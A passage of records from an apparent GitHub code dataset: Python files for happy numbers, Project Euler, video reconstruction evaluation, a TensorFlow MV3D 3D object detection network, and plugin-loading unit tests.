number\")\nelse:\n print(\"The number is a Sad number\")\n \n\n\ndef range_print(): # Function for printing happy numbers in the range \n l=int(input(\"Enter the first range : \"))\n u=int(input(\"Enter the final range : \"))\n for i in range(l,u+1):\n if check(i)==True:\n print(i)\nprint(\"\")\nrange_print()\n\n\ndef first_n_print(): # Function for printing first n happy numbers\n n=int(input(\"Enter the number of happy numbers needed : \"))\n count=0\n i=0\n while countb cr h w',b=1)\n Phi_s = einops.repeat(mask_s,'h w->b 1 h w',b=1)\n\n Phi = torch.from_numpy(Phi).to(args.device)\n Phi_s = torch.from_numpy(Phi_s).to(args.device)\n \n for ii in range(batch_size):\n single_meas = meas[ii].unsqueeze(0).unsqueeze(0)\n with torch.no_grad():\n outputs = model(single_meas, Phi, Phi_s)\n if not isinstance(outputs,list):\n outputs = [outputs]\n output = outputs[-1][0].cpu().numpy()\n batch_output.append(output)\n for jj in range(cr):\n if output.shape[0]==3:\n per_frame_out = output[:,jj]\n per_frame_out = np.sum(per_frame_out*test_data.rgb2raw,axis=0)\n else:\n per_frame_out = output[jj]\n per_frame_gt = gt[ii,jj, :, :]\n psnr += compare_psnr(per_frame_gt*255,per_frame_out*255)\n ssim += compare_ssim(per_frame_gt*255,per_frame_out*255)\n psnr = psnr / (batch_size * cr)\n ssim = ssim / (batch_size * cr)\n psnr_list.append(psnr)\n ssim_list.append(ssim)\n out_list.append(np.array(batch_output))\n gt_list.append(gt)\n\n test_dir = osp.join(args.work_dir,\"test_images\")\n if not osp.exists(test_dir):\n os.makedirs(test_dir)\n\n for i,name in enumerate(test_data.data_name_list):\n _name,_ = name.split(\"_\")\n psnr_dict[_name] = psnr_list[i]\n ssim_dict[_name] = ssim_list[i]\n out = out_list[i]\n gt = gt_list[i]\n for j in range(out.shape[0]):\n image_name = osp.join(test_dir,_name+\"_\"+str(j)+\".png\")\n save_image(out[j],gt[j],image_name)\n psnr_dict[\"psnr_mean\"] = np.mean(psnr_list)\n ssim_dict[\"ssim_mean\"] = np.mean(ssim_list)\n return psnr_dict,ssim_dict","repo_name":"ucaswangls/STFormer","sub_path":"cacti/utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"76"} +{"seq_id":"34081696782","text":"def sum_square(num_list):\n temp = list(num_list)\n for num in range(len(temp)):\n temp[num] = temp[num] ** 2\n return sum(temp)\n\n\ndef square_sum(num_list):\n return sum(num_list) * sum(num_list)\n\n\nif __name__ == '__main__':\n\n numbers = [i for i in range(1, 101)]\n sum_square(numbers)\n print(square_sum(numbers) - sum_square(numbers))\n","repo_name":"MarcusKJOoi/ProjectEuler","sub_path":"Problem6.py","file_name":"Problem6.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30202270239","text":"# created by Weizhi\n# birdview proposal net (3D RPN)\n# 3D proposal network\n# region fusion\nimport tensorflow as tf\nimport TensorflowUtils as utils\nimport numpy as np\nimport random\nimport pdb\n# from roi_pooling.roi_pooling_ops import roi_pooling\n\n# Vgg net modified for birdview input\ndef vgg_net_birdview(weights, image, debug, keep_prob):\n layers = (\n 'birdview_conv1_1', 'birdview_relu1_1', 'birdview_conv1_2', 'birdview_relu1_2', 'birdview_pool1',\n\n 'birdview_conv2_1', 'birdview_relu2_1', 'birdview_conv2_2', 'birdview_relu2_2', 'birdview_pool2',\n\n 'birdview_conv3_1', 'birdview_relu3_1', 'birdview_conv3_2', 'birdview_relu3_2', 'birdview_conv3_3',\n 
'birdview_relu3_3', 'birdview_pool3',\n\n 'birdview_conv4_1', 'birdview_relu4_1', 'birdview_conv4_2', 'birdview_relu4_2', 'birdview_conv4_3',\n 'birdview_relu4_3'\n\n # 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n # 'relu5_3'\n )\n\n # output of retrained layer for vgg\n net = {}\n current = image\n channel = image.get_shape().as_list()[3]\n\n for i, name in enumerate(layers):\n kind = name[9:13]\n if kind == 'conv':\n if name == 'birdview_conv1_1':\n # Modify the first conv layer\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n kernels = np.concatenate((np.repeat(kernels[:, :, 0 : 1], channel / 3, axis = 2), np.repeat(kernels[: , :, 1 : 2], channel / 3, axis = 2),\n np.repeat(kernels[:, :, 2 : 3], channel - 2 * (channel / 3), axis = 2)), axis = 2)\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n # pdb.set_trace()\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'birdview_conv4_1':\n # Modify the senventh conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index = random.sample(range(512), 256)\n kernels = kernels[:, :, :, sample_index]\n bias = bias[:, sample_index]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'birdview_conv4_2':\n # Modify the eighth conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'birdview_conv4_3':\n # pdb.set_trace()\n # Modify the ninth conv layer\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n\n else:\n kernels, bias = weights[i][0][0][0][0]\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = utils.get_variable(np.transpose(kernels, (1, 0, 2, 3)), name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif kind == 'relu':\n current = tf.nn.relu(current, name=name)\n if debug: \n \tutils.add_activation_summary(current)\n elif kind == 'pool':\n current = utils.avg_pool_2x2(current)\n net[name] = current\n # pdb.set_trace()\n\n return net\n\n\n# Vgg net modified for frontview input\ndef vgg_net_frontview(weights, image, debug, keep_prob):\n layers = (\n 'frontview_conv1_1', 'frontview_relu1_1', 'frontview_conv1_2', 
'frontview_relu1_2', 'frontview_pool1',\n\n 'frontview_conv2_1', 'frontview_relu2_1', 'frontview_conv2_2', 'frontview_relu2_2', 'frontview_pool2',\n\n 'frontview_conv3_1', 'frontview_relu3_1', 'frontview_conv3_2', 'frontview_relu3_2', 'frontview_conv3_3',\n 'frontview_relu3_3', 'frontview_pool3',\n\n 'frontview_conv4_1', 'frontview_relu4_1', 'frontview_conv4_2', 'frontview_relu4_2', 'frontview_conv4_3',\n 'frontview_relu4_3'\n\n # 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n # 'relu5_3'\n )\n\n # output of retrained layer for vgg\n net = {}\n current = image\n for i, name in enumerate(layers):\n kind = name[10:14]\n if kind == 'conv':\n if name == 'frontview_conv4_1':\n # Modify the senventh conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index = random.sample(range(512), 256)\n kernels = kernels[:, :, :, sample_index]\n bias = bias[:, sample_index]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'frontview_conv4_2':\n # Modify the eighth conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'frontview_conv4_3':\n # pdb.set_trace()\n # Modify the ninth conv layer\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n else:\n kernels, bias = weights[i][0][0][0][0]\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = utils.get_variable(np.transpose(kernels, (1, 0, 2, 3)), name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif kind == 'relu':\n current = tf.nn.relu(current, name=name)\n if debug: \n utils.add_activation_summary(current)\n elif kind == 'pool':\n current = utils.avg_pool_2x2(current)\n net[name] = current\n # pdb.set_trace()\n return net\n\n\n# Vgg net modified for rgb input\ndef vgg_net_rgb(weights, image, debug, keep_prob):\n layers = (\n 'rgb_conv1_1', 'rgb_relu1_1', 'rgb_conv1_2', 'rgb_relu1_2', 'rgb_pool1',\n\n 'rgb_conv2_1', 'rgb_relu2_1', 'rgb_conv2_2', 'rgb_relu2_2', 'rgb_pool2',\n\n 'rgb_conv3_1', 'rgb_relu3_1', 'rgb_conv3_2', 'rgb_relu3_2', 'rgb_conv3_3',\n 'rgb_relu3_3', 'rgb_pool3',\n\n 'rgb_conv4_1', 'rgb_relu4_1', 'rgb_conv4_2', 'rgb_relu4_2', 'rgb_conv4_3',\n 'rgb_relu4_3'\n\n # 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n # 'relu5_3'\n )\n\n # output of retrained layer for 
vgg\n net = {}\n current = image\n for i, name in enumerate(layers):\n kind = name[4:8]\n if kind == 'conv':\n if name == 'rgb_conv4_1':\n # Modify the senventh conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index = random.sample(range(512), 256)\n kernels = kernels[:, :, :, sample_index]\n bias = bias[:, sample_index]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'rgb_conv4_2':\n # Modify the eighth conv layer\n # pdb.set_trace()\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif name == 'rgb_conv4_3':\n # pdb.set_trace()\n # Modify the ninth conv layer\n kernels, bias = weights[i][0][0][0][0]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n sample_index_1 = random.sample(range(512), 256)\n sample_index_2 = random.sample(range(512), 256)\n kernels = kernels[:, :, sample_index_1, :]\n kernels = kernels[:, :, :, sample_index_2]\n bias = bias[:, sample_index_2]\n kernels = utils.get_variable(kernels, name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n else:\n kernels, bias = weights[i][0][0][0][0]\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = utils.get_variable(np.transpose(kernels, (1, 0, 2, 3)), name=name + \"_w\")\n bias = utils.get_variable(bias.reshape(-1), name=name + \"_b\")\n current = utils.conv2d_basic(current, kernels, bias, keep_prob)\n elif kind == 'relu':\n current = tf.nn.relu(current, name=name)\n if debug: \n utils.add_activation_summary(current)\n elif kind == 'pool':\n current = utils.avg_pool_2x2(current)\n net[name] = current\n # pdb.set_trace()\n\n return net\n\n# 3D proposal network\ndef Proposal_net(birdview, frontview, rgbview, model_dir, MODEL_URL, debug, keep_prob):\n #\"\"\" 3D region proposal network \"\"\"\n # input birdview, dropout probability, weight of vgg, ground-truth labels, ground-truth regression value, \n # anchor classification mask and anchor regression mask\n # The birdview has more than three channel, thus we need to train first two conv layers in vgg-16\n MODEL_URL = 'http://www.vlfeat.org/matconvnet/models/beta16/imagenet-vgg-verydeep-16.mat'\n print(\"setting up vgg initialized conv layers ...\")\n model_data = utils.get_model_data(model_dir, MODEL_URL)\n # preprocessing\n # mean = model_data['normalization'][0][0][0]\n # mean_pixel = np.mean(mean, axis=(0, 1))\n # processed_image = utils.process_image(birdview, mean_pixel)\n weights = np.squeeze(model_data['layers']) \n\n # vgg-birdview\n with tf.name_scope(\"birdview-Vgg-16\"):\n \n birdview_net = vgg_net_birdview(weights, birdview, debug, keep_prob)\n current = birdview_net[\"birdview_relu4_3\"]\n # upsample, output 256 channels\n with tf.name_scope(\"birdview_Upsample_layer\"):\n kernels = 
utils.weight_variable([3, 3, 256, 256], name= \"birdview_upsample_w\")\n bias = utils.bias_variable([256], name=\"birdview_upsample_b\")\n output_shape = current.get_shape().as_list()\n output_shape[1] *= 4\n output_shape[2] *= 4\n output_shape[3] = kernels.get_shape().as_list()[2]\n birdview_net['birdview_upsample'] = utils.conv2d_transpose_strided(current, kernels, bias, output_shape = output_shape, stride = 4, name = 'birdview_upsample', keep_prob = keep_prob)\n current = birdview_net['birdview_upsample']\n if debug: \n utils.add_activation_summary(current)\n\n # vgg-birdview\n with tf.name_scope(\"frontview-Vgg-16\"):\n frontview_net = vgg_net_frontview(weights, frontview, debug, keep_prob)\n current = frontview_net[\"frontview_relu4_3\"]\n # pdb.set_trace()\n # upsample, output 256 channels\n with tf.name_scope(\"frontview_Upsample_layer\"):\n kernels = utils.weight_variable([3, 3, 256, 256], name= \"frontview_upsample_w\")\n bias = utils.bias_variable([256], name=\"frontview_upsample_b\")\n output_shape = current.get_shape().as_list()\n output_shape[1] *= 4\n output_shape[2] *= 4\n output_shape[3] = kernels.get_shape().as_list()[2]\n frontview_net['frontview_upsample'] = utils.conv2d_transpose_strided(current, kernels, bias, output_shape = output_shape, stride = 4, name = 'frontview_upsample', keep_prob = keep_prob)\n current = frontview_net['frontview_upsample']\n if debug: \n utils.add_activation_summary(current)\n\n # vgg-birdview\n with tf.name_scope(\"rgb-Vgg-16\"):\n rgbview_net = vgg_net_rgb(weights, rgbview, debug, keep_prob)\n current = rgbview_net[\"rgb_relu4_3\"]\n # upsample, output 256 channels\n with tf.name_scope(\"rgb_Upsample_layer\"):\n kernels = utils.weight_variable([3, 3, 256, 256], name= \"rgb_upsample_w\")\n bias = utils.bias_variable([256], name=\"rgb_upsample_b\")\n output_shape = current.get_shape().as_list()\n output_shape[1] *= 2\n output_shape[2] *= 2\n output_shape[3] = kernels.get_shape().as_list()[2]\n rgbview_net['rgb_upsample'] = utils.conv2d_transpose_strided(current, kernels, bias, output_shape = output_shape, name = 'rgb_upsample', keep_prob = keep_prob)\n current = rgbview_net['rgb_upsample']\n if debug: \n utils.add_activation_summary(current)\n \n return birdview_net, frontview_net, rgbview_net\n\n# region pooling\n# def region_pooling(birdview_feat, frontview_feat, rgbview_feat, birdview_proposals, frontview_proposals, rgbview_proposals, batch_size, ROI_H, ROI_W):\n\ndef region_pooling(birdview_feat, frontview_feat, rgbview_feat, birdview_rois, frontview_rois, rgbview_rois, birdview_rois_ind, frontview_rois_ind, rgbview_rois_ind, ROI_H, ROI_W, debug):\n\n # dynamic region pooling\n\n birdview_channel = birdview_feat.get_shape().as_list()[3]\n frontview_channel = frontview_feat.get_shape().as_list()[3]\n rgbview_channel = rgbview_feat.get_shape().as_list()[3]\n birdview_region_list = [] \n frontview_region_list = []\n rgbview_region_list = []\n\n birdview_pooling_ROI = tf.image.crop_and_resize(birdview_feat, birdview_rois, birdview_rois_ind, [ROI_H, ROI_W], name = 'birdview_pooling_ROI')\n frontview_pooling_ROI = tf.image.crop_and_resize(frontview_feat, frontview_rois, frontview_rois_ind, [ROI_H, ROI_W], name = 'frontview_pooling_ROI')\n rgbview_pooling_ROI = tf.image.crop_and_resize(rgbview_feat, rgbview_rois, rgbview_rois_ind, [ROI_H, ROI_W], name = 'rgbview_pooling_ROI')\n \n if debug: \n utils.add_activation_summary(birdview_pooling_ROI)\n utils.add_activation_summary(frontview_pooling_ROI)\n 
utils.add_activation_summary(rgbview_pooling_ROI)\n \n\n return birdview_pooling_ROI, frontview_pooling_ROI, rgbview_pooling_ROI\n\n# fusion network\ndef region_fusion_net(birdview_region, frontview_region, rgbview_region, NUM_OF_REGRESSION_VALUE, ROI_H, ROI_W):\n # flat\n\n birdview_flatregion = tf.reshape(birdview_region, [-1, ROI_W * ROI_H * 256], name = 'birdview_flatregion')\n frontview_flatregion = tf.reshape(frontview_region, [-1, ROI_W * ROI_H * 256], name = 'frontview_flatregion')\n rgbview_flatregion = tf.reshape(rgbview_region, [-1, ROI_W * ROI_H * 256], name = 'rgbview_flatregion')\n\n with tf.name_scope(\"fusion-1\"):\n # first fusion\n # feature transformation is implemented by fully connected netwok\n\n joint_1 = utils.join(birdview_flatregion, frontview_flatregion, rgbview_flatregion, name = 'joint_1')\n fusion_birdview_1 = utils.fully_connected(joint_1, 1024, name = 'fusion_birdview_1') \n fusion_frontview_1 = utils.fully_connected(joint_1, 1024, name = 'fusion_frontview_1')\n fusion_rgbview_1 = utils.fully_connected(joint_1, 1024, name ='fusion_rgbview_1')\n\n with tf.name_scope(\"fusion-2\"):\n # second fusion\n joint_2 = utils.join(fusion_birdview_1, fusion_frontview_1, fusion_rgbview_1, name = 'joint_2')\n fusion_birdview_2 = utils.fully_connected(joint_2, 1024, name ='fusion_birdview_2')\n fusion_frontview_2 = utils.fully_connected(joint_2, 1024,name = 'fusion_frontview_2')\n fusion_rgbview_2 = utils.fully_connected(joint_2, 1024, name = 'fusion_rgbview_2')\n\n with tf.name_scope(\"fusion-3\"):\n # third fusion\n joint_3 = utils.join(fusion_birdview_2, fusion_frontview_2, fusion_rgbview_2, 'joint_3')\n fusion_birdview_3 = utils.fully_connected(joint_3, 1024, name ='fusion_birdview_3')\n fusion_frontview_3 = utils.fully_connected(joint_3, 1024,name = 'fusion_frontview_3')\n fusion_rgbview_3 = utils.fully_connected(joint_3, 1024,name = 'fusion_rgbview_3')\n \n\n with tf.name_scope(\"fusion-4\"):\n joint_4 = utils.join(fusion_birdview_3, fusion_frontview_3, fusion_rgbview_3, name ='joint_4')\n #pdb.set_trace()\n #joint_4= utils.join(birdview_flatregion, frontview_flatregion, rgbview_flatregion, name = 'joint_1')\n logits_cls = utils.fully_connected(joint_4, 2, name = 'fusion_cls_4', relu = False)\n logits_reg = utils.fully_connected(joint_4, NUM_OF_REGRESSION_VALUE, name = 'fusion_reg_4', relu = False)\n\n\n return logits_cls, logits_reg\n\n\n# l2 loss for regression\ndef l2_loss(s, t):\n \"\"\" L2 loss function. 
\"\"\"\n d = s - t\n x = d * d\n loss = tf.reduce_sum(x, 1)\n return loss\n\n# MV3D network comprised of 3D proposal network and region fusion networkj\n# def MV3D(birdview, frontview, rgbview, birdview_proposals, frontview_proposals, rgbview_proposals, proposals_mask, gt_ROI_labels, gt_ROI_regs, \n# \t birdview_rois, frontview_rois, rgbview_rois, ROI_H, ROI_W, model_dir, debug):\ndef MV3D(birdview, frontview, rgbview, cls_mask, reg_mask, gt_ROI_labels, gt_ROI_regs, \n birdview_rois, frontview_rois, rgbview_rois, birdview_box_ind, frontview_box_ind, \n rgbview_box_ind, ROI_H, ROI_W, NUM_OF_REGRESSION_VALUE, model_dir, weight, reg_weight, debug, keep_prob = 1.0):\n \n MODEL_URL = 'http://www.vlfeat.org/matconvnet/models/beta16/imagenet-vgg-verydeep-16.mat'\n \n \n with tf.name_scope(\"3D-Proposal-net\"):\n birdview_net, frontview_net, rgbview_net = Proposal_net(birdview, frontview, rgbview, model_dir, MODEL_URL, debug, keep_prob)\n # accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(all_rpn_logits, dimension=1), tf.reshape(gt_anchor_labels, [-1])), tf.float32))\n\n with tf.name_scope(\"ROI-pooling\"):\n # birdview_pooling_ROI, frontview_pooling_ROI, rgbview_pooling_ROI = region_pooling(birdview_net['birdview_relu4_3'], frontview_net['frontview_relu4_3'], rgbview_net['rgb_relu4_3'], \n # birdview_proposals, frontview_proposals, rgbview_proposals, birdview_rois, frontview_rois, \n # rgbview_rois, ROI_H, ROI_W, debug)\n birdview_pooling_ROI, frontview_pooling_ROI, rgbview_pooling_ROI = region_pooling(birdview_net['birdview_upsample'], frontview_net['frontview_upsample'], rgbview_net['rgb_upsample'], \n birdview_rois, frontview_rois, rgbview_rois, birdview_box_ind, frontview_box_ind, rgbview_box_ind, \n ROI_H, ROI_W, debug)\n # pdb.set_trace()\n with tf.name_scope(\"region-fusion-net\"):\n logits_cls, logits_reg = region_fusion_net(birdview_pooling_ROI, frontview_pooling_ROI, rgbview_pooling_ROI, NUM_OF_REGRESSION_VALUE, ROI_H, ROI_W)\n # pdb.set_trace()\n with tf.name_scope(\"loss\"):\n \n gt_ROI_regs = tf.reshape(gt_ROI_regs, [-1, NUM_OF_REGRESSION_VALUE])\n gt_ROI_labels = tf.reshape(gt_ROI_labels, [-1])\n regression_loss = tf.reduce_sum(l2_loss(logits_reg, gt_ROI_regs) * tf.cast(reg_mask, tf.float32)) / tf.cast(tf.reduce_sum(reg_mask), tf.float32)\n \n classification_loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(labels = gt_ROI_labels, logits = logits_cls) * tf.cast(cls_mask, tf.float32)) / tf.cast(tf.reduce_sum(cls_mask), tf.float32)\n # regularization\n trainable_var = tf.trainable_variables()\n weight_decay = 0\n for var in trainable_var:\n weight_decay = weight_decay + tf.nn.l2_loss(var) \n\n loss = regression_loss + weight * classification_loss + reg_weight * weight_decay\n\n return loss, classification_loss, regression_loss, logits_cls, logits_reg\n\n# Birdview proposal network (3D RPN) \ndef birdview_proposal_net(birdview, gt_anchor_labels, gt_anchor_regs, anchor_cls_masks, anchor_reg_masks, weight, reg_weight, model_dir, batch_size, debug, keep_prob = 1.0):\n #\"\"\" 3D region proposal network \"\"\"\n # input birdview, dropout probability, weight of vgg, ground-truth labels, ground-truth regression value, \n # anchor classification mask and anchor regression mask\n # The birdview has more than three channel, thus we need to train first two conv layers in vgg-16\n # Miscellaneous definition\n MODEL_URL = 'http://www.vlfeat.org/matconvnet/models/beta16/imagenet-vgg-verydeep-16.mat'\n NUM_OF_REGRESSION_VALUE = 6\n NUM_OF_ANCHOR = 4\n FCN_KERNEL_SIZE = 3\n\n 
print(\"setting up vgg initialized conv layers ...\")\n model_data = utils.get_model_data(model_dir, MODEL_URL)\n weights = np.squeeze(model_data['layers']) \n\n # store output from classfication layer and regression layer\n all_rpn_logits = []\n all_rpn_regs = []\n current = birdview\n\n\n # vgg\n with tf.name_scope(\"Vgg-16\"):\n net = vgg_net_birdview(weights, birdview, debug, keep_prob)\n current = net[\"birdview_relu4_3\"]\n # upsample, output 256 channels\n with tf.name_scope(\"Upsample_layer\"):\n kernels = utils.weight_variable([3, 3, 256, 256], name= \"upsample_w\")\n bias = utils.bias_variable([256], name=\"upsample_b\")\n net['upsample'] = utils.conv2d_transpose_strided(current, kernels, bias, name = 'upsample', keep_prob = keep_prob)\n current = net['upsample']\n if debug: \n utils.add_activation_summary(current)\n with tf.name_scope(\"Fully_conv_layer\"):\n # Fully convolution layer of 3D proposal network. Similar to the last layer of Region Prosal Network.\n \n for j in range(NUM_OF_ANCHOR):\n kernels_cls = utils.weight_variable([FCN_KERNEL_SIZE, FCN_KERNEL_SIZE, 256, 2], name= \"FCN_cls_w\" + str(j))\n kernels_reg = utils.weight_variable([FCN_KERNEL_SIZE, FCN_KERNEL_SIZE, 256, NUM_OF_REGRESSION_VALUE], name= \"FCN_reg_w\" + str(j))\n bias_cls = utils.bias_variable([2], name=\"FCN_cls_b\" + str(j))\n bias_reg = utils.bias_variable([6], name=\"FCN_reg_b\"+ str(j))\n rpn_logits = utils.conv2d_basic(current, kernels_cls, bias_cls)\n rpn_regs = utils.conv2d_basic(current, kernels_reg, bias_reg)\n net[\"FCN_cls_\" + str(j)] = rpn_logits\n net[\"FCN_reg_\" + str(j)] = rpn_regs\n if debug:\n utils.add_activation_summary(rpn_logits)\n\n rpn_logits = tf.reshape(rpn_logits, [batch_size, -1, 2])\n all_rpn_logits.append(rpn_logits)\n # Values required clip might be different\n # rpn_regs = tf.clip_by_value(rpn_regs, -0.2, 0.2)\n rpn_regs = tf.reshape(rpn_regs, [batch_size, -1, NUM_OF_REGRESSION_VALUE])\n all_rpn_regs.append(rpn_regs)\n \n with tf.name_scope(\"Cls_and_reg_loss\"):\n \n all_rpn_logits = tf.concat(all_rpn_logits, 1)\n all_rpn_regs = tf.concat(all_rpn_regs, 1)\n # pdb.set_trace()\n all_rpn_logits = tf.reshape(all_rpn_logits, [-1, 2])\n all_rpn_logits_softmax = tf.nn.softmax(all_rpn_logits, dim = -1)\n all_rpn_regs = tf.reshape(all_rpn_regs, [-1, NUM_OF_REGRESSION_VALUE])\n \n # Compute the loss function\n gt_anchor_labels = tf.reshape(gt_anchor_labels, [-1]) \n gt_anchor_regs = tf.reshape(gt_anchor_regs, [-1, NUM_OF_REGRESSION_VALUE])\n anchor_cls_masks = tf.reshape(anchor_cls_masks, [-1])\n anchor_reg_masks = tf.reshape(anchor_reg_masks, [-1])\n\n # Classification loss\n classification_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = gt_anchor_labels, logits = all_rpn_logits) * anchor_cls_masks\n classification_loss = tf.reduce_sum(classification_loss) / tf.maximum(tf.reduce_sum(anchor_cls_masks), 1)\n\n #regression loss\n regression_loss = tf.reduce_sum(l2_loss(all_rpn_regs, gt_anchor_regs) * anchor_reg_masks) / tf.maximum(tf.reduce_sum(anchor_reg_masks), 1)\n\n # regularization\n trainable_var = tf.trainable_variables()\n weight_decay = 0\n for var in trainable_var:\n weight_decay = weight_decay + tf.nn.l2_loss(var)\n\n Overall_loss = weight * classification_loss + regression_loss + reg_weight * weight_decay\n\n \n return net, classification_loss, regression_loss, Overall_loss, all_rpn_logits_softmax, 
all_rpn_regs","repo_name":"wayne0908/Multi-View-3D-Object-Detection-Network-for-Autonomous-Driving","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":27845,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"76"} +{"seq_id":"30906582111","text":"from collections import defaultdict\nfrom unittest import TestCase\n\nfrom testfixtures import ShouldRaise, Replacer, compare\n\nfrom archivist.plugins import Plugins\n\n\nplugin1 = object()\nplugin2 = object()\nplugin3 = object()\nplugin4 = object()\n\n\nclass MockEntryPoint(object):\n def __init__(self, name, obj):\n self.name, self.obj = name, obj\n def load(self):\n return self.obj\n\n\nclass TestPluginLoading(TestCase):\n\n def mock_iter_entry_points(self, group):\n return self.entry_points[group]\n\n def setUp(self):\n self.entry_points = defaultdict(list)\n\n def load_plugins(self):\n with Replacer() as r:\n r.replace('archivist.plugins.iter_entry_points',\n self.mock_iter_entry_points)\n plugins = Plugins.load()\n return plugins\n\n def test_no_plugins(self):\n plugins = self.load_plugins()\n with ShouldRaise(KeyError('foo')):\n plugins.get('notification', 'foo')\n with ShouldRaise(KeyError('foo')):\n plugins.get('repo', 'foo')\n with ShouldRaise(KeyError('foo')):\n plugins.get('source', 'foo')\n\n def test_one_notification_plugin(self):\n self.entry_points['archivist.notification'].append(\n MockEntryPoint('foo', plugin1)\n )\n plugins = self.load_plugins()\n compare(plugin1, plugins.get('notification', 'foo'))\n with ShouldRaise(KeyError('foo')):\n plugins.get('repo', 'foo')\n with ShouldRaise(KeyError('foo')):\n plugins.get('source', 'foo')\n\n def test_one_repo_plugin(self):\n self.entry_points['archivist.repo'].append(\n MockEntryPoint('foo', plugin1)\n )\n plugins = self.load_plugins()\n with ShouldRaise(KeyError('foo')):\n plugins.get('notification', 'foo')\n compare(plugin1, plugins.get('repo', 'foo'))\n with ShouldRaise(KeyError('foo')):\n plugins.get('source', 'foo')\n\n def test_one_source_plugin(self):\n self.entry_points['archivist.source'].append(\n MockEntryPoint('foo', plugin1)\n )\n plugins = self.load_plugins()\n with ShouldRaise(KeyError('foo')):\n plugins.get('notification', 'foo')\n with ShouldRaise(KeyError('foo')):\n 